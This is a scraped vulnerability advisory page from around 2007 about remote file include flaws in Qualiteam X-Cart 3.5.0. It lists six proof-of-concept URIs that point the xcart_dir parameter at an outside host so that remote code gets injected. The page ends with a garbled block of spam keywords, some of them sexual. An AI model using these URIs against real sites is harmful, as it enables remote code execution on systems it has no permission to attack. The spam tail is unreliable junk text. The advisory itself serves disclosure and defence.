exploits , vulnerabilities , articles , Qualiteam X-Cart xcart_dir Multiple Remote File Include Vulnerabilities

Title	Qualiteam X-Cart xcart_dir Multiple Remote File Include Vulnerabilities
Published	2007-09-11-12:00AM
Updated	2007-09-12-07:31PM
Class	Input Validation Error
CVE
Remote	Yes
Local	No
Credit	aLiiF is credited with the discovery of these vulnerabilities.
Vulnerable	Qualiteam XCart 3.5 .0
Not Vulnerable	Qualiteam X-Cart 4.1.8
Code	An attacker can exploit these issues via a browser.The following proof-of-concept URIs are available:http://www.example.com/[xcart-path]/config.php?xcart_dir=http://www.example2.com /[inject]? http://www.example.com/[xcart-path]/prepare.php?xcart_dir=http://www.example2.com /[inject]? http://www.example.com/[xcart-path]/smarty.php?xcart_dir=http://www.example2.com /[inject]? http://www.example.com/[xcart-path]/customer/product.php?xcart_dir=http://www.example2.com /[inject]? http://www.example.com/[xcart-path]/provider/auth.php?xcart_dir=http://www.example2.com /[inject]? http://www.example.com/[xcart-path]/admin/auth.php?xcart_dir=http://www.example2.com /[inject]?
TXT

Vulnerabilities - newest 10 RSS | More

2009-12-17 Mozilla Firefox CVE-2009-3979 Multiple Remote Memory Corruption Vulnerabilities
2009-12-17 Mozilla Firefox CVE-2009-3981 Remote Memory Corruption Vulnerability
2009-12-17 Drupal Sections Module HTML Injection Vulnerability
2009-12-17 Mozilla Firefox and SeaMonkey Theora Video Library Remote Integer Overflow Vulnerability
2009-12-17 Mozilla Firefox and Sea Monkey Insecure Protocol Location Bar Spoofing Vulnerability
2009-12-17 Mozilla Firefox and Sea Monkey Content Injection Spoofing Vulnerability
2009-12-17 Mozilla Firefox/SeaMonkey GeckoActiveXObject Exception Message COM Object Enumeration Vulnerability
2009-12-16 ZABBIX Denial Of Service and SQL Injection Vulnerabilities
2009-12-16 IBM WebSphere Application Server JNDI Remote Information Disclosure Vulnerability
2009-12-16 Horde Application Framework Administration Interface Cross-Site Scripting Vulnerability

SECURITY RSS FEEDS

Advertising

Copyright 2007, SecurityDot
Thu, 17 Dec 2009 14:22:25 +0000

Friends : milw0rm.com , secunia.com , securityfocus.com
GOOGLE
NEWS EXPLOITS VULNS
exploits , 0day exploits , newest exploits , vulnerabilities , newest vulnerabilities , 0day vulnerabilities , newest articles , linux articles , articles
WWW.TaMILS www.szdytx www.wwylc. Cricket pi Cricket pi news for c www.szdytx Www xxx.c0 TCP/IP Crack+Data www.021-12 india sex www.szdytx Film++seks aswariya r Jennifer l xxxftleid free sexy t301t IMAG www shakee Bok Berbideosp Ibp www.stock0 burning bo Preity zin Opan sex news for C Www.C700.C www.stock0 www.kidsse reemasen +vBulletin GET /galle /search/ex www.taozhi http://hi. ftp bug wi Www sex co 443 port Method 219.139.72 200 /media shop364224 xxxx Hardsex www.stock0 Free Sex p www.stock0